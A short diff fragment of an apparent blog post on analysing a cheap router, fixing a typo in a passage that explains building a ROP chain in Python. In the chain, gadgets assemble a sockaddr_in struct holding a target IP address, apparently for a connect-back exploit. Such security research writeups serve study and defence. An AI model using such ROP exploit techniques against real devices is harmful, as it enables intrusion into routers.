luke-r-mills/luke-r-mills.github.io/_posts/2023-04-21-analysing-a-dirt-cheap-router_part_3.md

 chain += p32(0x57864 + base_address) # ra
 ```

-With these arguments set, we can finally construct the *sockaddr_in* struct with the following gadgets - the comment do a pretty good job explaining what is happening.
+With these arguments set, we can finally construct the *sockaddr_in* struct with the following gadgets - the comments do a pretty good job explaining what is happening.
 We are basically copying the memory address with the desired values (*0x0* *0x2*) I mentioned earlier, and appending the IP address of the target:

 ```python
 # s1 has our sockaddr address, load address of afinet into v0